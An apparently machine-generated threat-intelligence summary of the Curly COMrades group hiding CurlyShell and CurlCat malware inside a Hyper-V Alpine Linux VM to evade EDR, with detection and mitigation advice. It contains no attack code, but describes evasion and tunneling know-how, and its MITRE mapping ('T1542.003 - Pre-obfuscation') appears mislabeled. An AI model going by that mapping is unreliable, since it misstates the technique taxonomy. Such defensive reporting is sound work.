Full Report
The threat actor known as Curly COMrades has been observed exploiting virtualization technologies as a way to bypass security solutions and execute custom malware. According to a new report from Bitdefender, the adversary is said to have enabled the Hyper-V role on selected victim systems to deploy a minimalistic, Alpine Linux-based virtual machine. "This hidden environment, with its lightweight
Analysis Summary
# Tool/Technique: Hyper-V Virtualization Exploitation (Curly COMrades Context)
## Overview
The threat actor Curly COMrades is observed exploiting the native Windows Hyper-V virtualization platform to establish a hidden, persistent operating environment. By enabling the Hyper-V role on compromised Windows 10 hosts and deploying a minimalistic Alpine Linux virtual machine, the actor creates an execution sandbox isolated from traditional host-based EDR solutions, thus achieving evasion and persistence.
## Technical Details
- Type: Technique (Leveraging legitimate virtualization platform)
- Platform: Windows 10 (Host), Alpine Linux (Guest VM)
- Capabilities: Evasion of host-based EDR, creating a hidden command execution environment, hosting custom malware (CurlyShell, CurlCat).
- First Seen: The activity cluster has been active since late 2023, with Hyper-V weaponization observed in recent follow-up analysis (Post-August 2025).
## MITRE ATT&CK Mapping
- **TA0005 - Defense Evasion**
- T1542.003 - Pre-obfuscation: Use of Virtualization Technology
- **TA0003 - Persistence**
- T1547.001 - Registry Run Keys / Startup Folder (Indirectly, via establishing reliable VM access post-initial access)
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols (via HTTP GET/POST)
## Functionality
### Core Capabilities
* **Evasion:** Running malware (CurlyShell, CurlCat) inside a disposable, lightweight Linux VM isolates execution from the native Windows host monitoring tools (EDR).
* **Lightweight Environment:** The deployed Alpine Linux VM has a highly reduced footprint (120MB disk space and 256MB memory).
* **Reverse Shell:** Deployment of **CurlyShell**, an ELF binary that acts as a persistent reverse shell, connecting back to C2 servers.
* **Data Flow:** Utilizes HTTP GET requests to poll for encrypted commands and HTTP POST requests to send back results.
### Advanced Features
* **Custom Malware Families:** Utilizes **CurlyShell** (executes commands directly) and **CurlCat** (funnels traffic via SSH), both sharing a large code base optimized for execution within the VM.
* **Reverse Proxy Capability:** Reliance on multiple proxy/tunneling tools (Resocks, Rsockstun, Ligolo-ng, CCProxy, Stunnel, SSH) to maintain flexible C2 resilience.
* **Data Exfiltration/Transfer:** **CurlCat** is specifically noted for its role in bidirectional data transfer within the isolated environment.
## Indicators of Compromise
* File Hashes: N/A (Specific hashes not provided in the text)
* File Names: CurlyShell (ELF binary), CurlCat (Implied ELF binary or component)
* Registry Keys: N/A
* Network Indicators: Communication uses standard HTTP GET/POST, likely directed at C2 servers controlled by Curly COMrades (C2 addresses are not specified/defanged). Tunneling tools may generate outbound traffic associated with Resocks, Rsockstun, Ligolo-ng, or Stunnel.
* Behavioral Indicators: Detection of Hyper-V role enablement on non-essential hosts. Deployment/execution of C++-compiled ELF binaries (CurlyShell) as headless background daemons on Windows hosts.
## Associated Threat Actors
* Curly COMrades (Active since late 2023, targeting Georgia and Moldova, interests aligned with Russia).
## Detection Methods
* Signature-based detection: Targeting known IOCs for associated tools (RuRat, Mimikatz, MucorAgent) used alongside the VM deployment.
* Behavioral detection: Monitoring for unusual Hyper-V role enablement and subsequent creation of minimalistic Alpine Linux VMs. Monitoring for the execution of custom ELF binaries (CurlyShell) on a Windows infrastructure.
* YARA rules: N/A (Specific rules not provided).
## Mitigation Strategies
* **Prevention:** Disable or restrict the enablement of the Hyper-V role on endpoints unless explicitly required for business function. Implement strict controls over system configuration changes.
* **Hardening:** Employ strong host-based security solutions (EDR/XDR) capable of monitoring virtualization layer activity and suspicious process execution, even for non-native binaries. Monitor for the execution of associated proxy/tunneling tools (Ligolo-ng, Stunnel).
## Related Tools/Techniques
* **Custom Malware:** CurlyShell, CurlCat, MucorAgent (Modular .NET implant), RuRat.
* **Third-Party Tools Used for Tunneling/Proxying:** Resocks, Rsockstun, Ligolo-ng, CCProxy, Stunnel.
* **Other Implants Mentioned:** Mimikatz (Credential Harvesting).
* **Technique Analogs:** Use of other virtual environments (VMware, KVM) for evasion.